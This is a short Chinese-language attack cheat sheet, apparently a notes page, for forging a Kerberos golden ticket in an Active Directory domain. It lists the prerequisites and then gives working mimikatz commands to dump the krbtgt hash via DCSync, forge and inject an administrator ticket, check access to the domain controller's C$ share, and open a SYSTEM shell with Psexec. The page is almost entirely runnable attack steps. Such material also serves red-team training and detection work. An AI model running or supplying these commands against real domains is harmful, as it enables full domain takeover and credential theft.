企业🤖AI智能体构建引擎,智能编排和调试,一键部署,支持知识库和私有化部署方案 广告
[TOC] ## 信息收集 ~~~ 1、完整的域名称 2、krbtgt账户的NTLM Hash 或者 AES-256 域控的mimikatz 中运行:lsadump::dcsync /domain:dongta.test /user:krbtgt 3、域的sid wmic useraccount get name,sid,dome 4、需要伪造的域管理员用户名 ~~~ ## mimikatz工具伪造黄金票据 ~~~ 创建黄金票据 kerberos::golden /admin:administrator /domain:dongta.test /sid:S-1-5-21-4119513073-439187860-1128162503 /krbtgt:bf1f6b7aa523778b5a45036c58c1a83b /ticket:administrator.kiribi 清空票据 kerberos::purge 导入票据 kerberos::ptt administrator.kiribi 查看票据cmd中运行 klist 验证票据 dir \\dc1\c$ 建立shell Psexec.exe \\dc1 -s cmd.exe ~~~